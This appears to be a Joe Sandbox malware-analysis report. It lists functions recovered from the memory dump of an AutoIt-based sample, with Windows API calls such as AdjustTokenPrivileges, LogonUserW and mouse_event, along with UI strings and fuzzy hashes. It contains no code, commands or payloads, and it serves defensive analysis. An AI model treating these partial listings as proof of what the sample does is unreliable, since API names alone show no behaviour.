Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d807a7b1900de467e98dd19fd7c9aa86fb0fb09ff388a7cd8e5555810fd8d140
Instruction ID: 7e647420865c76dc3a966697fc6b653f326738fb75ec5207050936eac7dc47a9
Opcode Fuzzy Hash: d807a7b1900de467e98dd19fd7c9aa86fb0fb09ff388a7cd8e5555810fd8d140
Instruction Fuzzy Hash: 10F03775A11209BBEB04DFE49C89ABEBBB8EF08201F1044A9A901E2581EA756A149B50

Function 000DC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000DC6FB
FindClose.KERNEL32(00000000), ref: 000DC72B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bee6db4e7532e7d091a47d2a7ea356b8dbe9ae65626069697eced56c0d4f3d99
Instruction ID: bab2b9f7c1746fc5c4d5ec88ba93b2e5e76c2846e6e268b09a663d2315f415f2
Opcode Fuzzy Hash: bee6db4e7532e7d091a47d2a7ea356b8dbe9ae65626069697eced56c0d4f3d99
Instruction Fuzzy Hash: B8118E72A006019FDB10DF29C885A6AF7E8EF85320F10851EF8A987391DB34A805CB95

Function 000DA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,000E9468,?,000FFB84,?), ref: 000DA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,000E9468,?,000FFB84,?), ref: 000DA0A9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8dbe308dfeaeb1df6e9be75de8d8be99dc44d5927a89c0a0ab06c18fbcd4d167
Instruction ID: 382161b0b87c420231fd7c72797c29495d1d9bba9cd943bcb6ef34dc8eaea5cc
Opcode Fuzzy Hash: 8dbe308dfeaeb1df6e9be75de8d8be99dc44d5927a89c0a0ab06c18fbcd4d167
Instruction Fuzzy Hash: F1F0823560532DABDB619FA4CC48FFA776CBF09361F008166F909D6281D6749A40CBA1

Function 000C81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000C8309), ref: 000C81E0
CloseHandle.KERNEL32(?,?,000C8309), ref: 000C81F2

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b04113022d0a578bb7265f87db0fd0d0bee5081ca7a47124d7c4d68e05d34809
Instruction ID: 46fc36b59ee1f39a81ef0ae43cedef9b2a4b7eb10ed476c2e5e7e2486d5ab6d3
Opcode Fuzzy Hash: b04113022d0a578bb7265f87db0fd0d0bee5081ca7a47124d7c4d68e05d34809
Instruction Fuzzy Hash: 4FE0E672010511AFFB256B64EC09D7777EDEF04310714882DF86584471DB615C91EB14

Function 0009A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00098D57,?,?,?,00000001), ref: 0009A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0009A163

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4a53bc92dafca716e0012c3deb49b70fb312dcc7fbe41b9cc61e5c71357d5ac8
Instruction ID: 9bd1a6fa7cf2aafdafcdd862d015a18e8c1f9655b00225c7465fca6fbb3ee86f
Opcode Fuzzy Hash: 4a53bc92dafca716e0012c3deb49b70fb312dcc7fbe41b9cc61e5c71357d5ac8
Instruction Fuzzy Hash: A0B0923105420AABEA102B91EC09BB83F6AEF44AA2F404020F60D84860CBE65650EA95

Function 0009F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 420135f5c6e53b63db34b476b3300bc3c2a4c0201232e8971c9c5fc4f59531ee
Instruction ID: 00a85c88a3bf2170e780932f14b6adae520d269341f46019ce5e7e4ca1e81b03
Opcode Fuzzy Hash: 420135f5c6e53b63db34b476b3300bc3c2a4c0201232e8971c9c5fc4f59531ee
Instruction Fuzzy Hash: 91320121D29F024DDB639634D832336A289AFB73C4F15D737E86AB5DA6EB68D4C35100

Function 000A242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e77e6402097e4c85b016af758ac4ba51079247e147b11ae75170389569700e5
Instruction ID: f53bf6be256e95c2796bf8915207901632a1bfa1a6aaca1c03e63a510230e0d4
Opcode Fuzzy Hash: 9e77e6402097e4c85b016af758ac4ba51079247e147b11ae75170389569700e5
Instruction Fuzzy Hash: C7B1FF20E2AF404DD22396398835336BA5CBFBB2C5F92D71BFCA674D22EB6185C34141

Function 000D8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 000D889B

Part of subcall function 0009520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,000D8F6E,00000000,?,?,?,?,000D911F,00000000,?), ref: 00095213
Part of subcall function 0009520A: __aulldiv.LIBCMT ref: 00095233

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: b16a388289d5991c4b30c8549b5e7b71430689fb0f01967f55fde5af20fcf127
Instruction ID: 19cc3cb2f82028b1defbdfa2daeb065f1aa5b322bee7ba58564aef67ae96d8d2
Opcode Fuzzy Hash: b16a388289d5991c4b30c8549b5e7b71430689fb0f01967f55fde5af20fcf127
Instruction Fuzzy Hash: 8221AF326256108BC729CF29D841A52B3E1EFA5311F688E6DD1F5CB2C0CE34B945DB94

Function 000D4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000D4C4A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8774b4dc04eedb25c8cbf8567bc61818d5f1527889e90a4409d588cb479639de
Instruction ID: 8c7bd248a343c2335952793c978bd7d5499a68133ca76322d5b059eb08ec8a56
Opcode Fuzzy Hash: 8774b4dc04eedb25c8cbf8567bc61818d5f1527889e90a4409d588cb479639de
Instruction Fuzzy Hash: 48D05E9117570A7BFCFC0B609E2FF7A0188E300792FD0A14B72058A2C2ECF06C40A030

Function 000C87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000C8389), ref: 000C87D1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 53fd1579244bc46bacee04dbeacbd506a1adeb0721b33f61a7eff0804303537e
Instruction ID: 833deb89e1221ebafb6c0f8d58cba6650b7df4a47dfd56e893b690ada150bf0e
Opcode Fuzzy Hash: 53fd1579244bc46bacee04dbeacbd506a1adeb0721b33f61a7eff0804303537e
Instruction Fuzzy Hash: 6AD05E3226050EABEF018EA4DC01EBE3B69EB04B01F448111FE15C50A1C775D835EF60

Function 0009A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0009A12A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3f629a2bc5b4b5b539d90156c968154f640383afbc6b21883fadecdb6058bcf3
Instruction ID: 69a8cd9c90d19b28086e47b4e40168b1304cb39d56b6a7ba9a91e87f2cfdbe82
Opcode Fuzzy Hash: 3f629a2bc5b4b5b539d90156c968154f640383afbc6b21883fadecdb6058bcf3
Instruction Fuzzy Hash: ABA0123000010DA78A001B41EC044647F6DDB001907004020F40C4042187B255109580

Function 00088808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df290c4296bc8bfe3d15984ad3fcdc52d406dc11d5a3dbe9754b2bfec56a3f8
Instruction ID: 2e5f6515e13e5402e07997bf53f04086061f9649285ebc106392c28fe180dd9e
Opcode Fuzzy Hash: 6df290c4296bc8bfe3d15984ad3fcdc52d406dc11d5a3dbe9754b2bfec56a3f8
Instruction Fuzzy Hash: 99221230504556CBEF7CAB64C894B7C7BE1FB01345FA8C06AD9D28A592DB70ADE1C742

Function 000921C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 503046ce402522386909e4d5f13782d29d8ab17e401170c27480bba62ce2c956
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 09C198322061931ADFAD4639C47417EFBE15FA27B131A07ADD4B3CB1D4EE20CA65E620

Function 000925FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 9b20729b312804c20a0efcab84cec14ea1aa82197a83dae868ec075702e5e417
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F1C1663220A1930ADFAD4639C47417EFAE15FA27B131A07ADD4B3DB1D5EE10CA25E660

Function 00091978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: c94eee0480ced6c7baf9c235f8948bca06a9b552a0e05f7bd9a6691bdb6a1614
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 93C1837230619309DFAD4639C4741BEBBE15FA27B131A07ADD4B3CB1D4EE20CA65E660

Function 000E7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000E785B
DeleteObject.GDI32(00000000), ref: 000E786D
DestroyWindow.USER32 ref: 000E787B
GetDesktopWindow.USER32 ref: 000E7895
GetWindowRect.USER32(00000000), ref: 000E789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000E79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000E79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7A35
GetClientRect.USER32(00000000,?), ref: 000E7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000E7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7ABB
GlobalLock.KERNEL32(00000000), ref: 000E7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7AD3
GlobalUnlock.KERNEL32(00000000), ref: 000E7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7AE3
GlobalFree.KERNEL32(00000000), ref: 000E7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00102CAC,00000000), ref: 000E7B16
GlobalFree.KERNEL32(00000000), ref: 000E7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000E7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000E7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000E7D7A

Strings

static, xrefs: 000E7A75, 000E7BCC
AutoIt v3, xrefs: 000E7A2D
, xrefs: 000E7D00
DISPLAY, xrefs: 000E7BDD

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 108d043499fd0bfd0494c24d874e5346990a1d719c161164740b123a2f1ca61a
Instruction ID: 59a697fe33fd7df76f340cb9dd29b083b0207d96e29a2f3ef294f29d844d05df
Opcode Fuzzy Hash: 108d043499fd0bfd0494c24d874e5346990a1d719c161164740b123a2f1ca61a
Instruction Fuzzy Hash: DE026A71900115EFEB14DFA5DD89EBE7BB9EF48710F148158F909AB2A1CB34AD01DB60

Function 000F356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,000FF910), ref: 000F3627
IsWindowVisible.USER32(?), ref: 000F364B

Strings

GETCURRENTCOL, xrefs: 000F3928
ISCHECKED, xrefs: 000F3839
HIDEDROPDOWN, xrefs: 000F3700
EDITPASTE, xrefs: 000F395F
SETCURRENTSELECTION, xrefs: 000F37B6
GETCURRENTSELECTION, xrefs: 000F37E3
FINDSTRING, xrefs: 000F3776
ISVISIBLE, xrefs: 000F3637
SHOWDROPDOWN, xrefs: 000F36E0
ISENABLED, xrefs: 000F366B
SELECTSTRING, xrefs: 000F3806
ADDSTRING, xrefs: 000F3716
CHECK, xrefs: 000F386D
GETLINE, xrefs: 000F399B
UNCHECK, xrefs: 000F3883
CURRENTTAB, xrefs: 000F36BD
TABRIGHT, xrefs: 000F369D
GETCURRENTLINE, xrefs: 000F38ED
GETLINECOUNT, xrefs: 000F38C6
DELSTRING, xrefs: 000F3749
GETSELECTED, xrefs: 000F38A3
SENDCOMMANDID, xrefs: 000F39DA
TABLEFT, xrefs: 000F3687

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 11995035b8d2305024e5e8b724ed9da9015acfd06b5c752830a28f26294a3972
Instruction ID: ac436b6015bbf0a7cc6a4a3635034a982a39f7d42bcc160092c3d640eebcdb4e
Opcode Fuzzy Hash: 11995035b8d2305024e5e8b724ed9da9015acfd06b5c752830a28f26294a3972
Instruction Fuzzy Hash: A9D1A2702083059FCB14EF10C551ABE77E1AF953A0F148458F9865B7A3CB35DE0AEB92

Function 000FA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 000FA630
GetSysColorBrush.USER32(0000000F), ref: 000FA661
GetSysColor.USER32(0000000F), ref: 000FA66D
SetBkColor.GDI32(?,000000FF), ref: 000FA687
SelectObject.GDI32(?,00000000), ref: 000FA696
InflateRect.USER32(?,000000FF,000000FF), ref: 000FA6C1
GetSysColor.USER32(00000010), ref: 000FA6C9
CreateSolidBrush.GDI32(00000000), ref: 000FA6D0
FrameRect.USER32(?,?,00000000), ref: 000FA6DF
DeleteObject.GDI32(00000000), ref: 000FA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 000FA731
FillRect.USER32(?,?,00000000), ref: 000FA763
GetWindowLongW.USER32(?,000000F0), ref: 000FA78E

Part of subcall function 000FA8CA: GetSysColor.USER32(00000012), ref: 000FA903
Part of subcall function 000FA8CA: SetTextColor.GDI32(?,?), ref: 000FA907
Part of subcall function 000FA8CA: GetSysColorBrush.USER32(0000000F), ref: 000FA91D
Part of subcall function 000FA8CA: GetSysColor.USER32(0000000F), ref: 000FA928
Part of subcall function 000FA8CA: GetSysColor.USER32(00000011), ref: 000FA945
Part of subcall function 000FA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000FA953
Part of subcall function 000FA8CA: SelectObject.GDI32(?,00000000), ref: 000FA964
Part of subcall function 000FA8CA: SetBkColor.GDI32(?,00000000), ref: 000FA96D
Part of subcall function 000FA8CA: SelectObject.GDI32(?,?), ref: 000FA97A
Part of subcall function 000FA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 000FA999
Part of subcall function 000FA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000FA9B0
Part of subcall function 000FA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 000FA9C5
Part of subcall function 000FA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000FA9ED

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
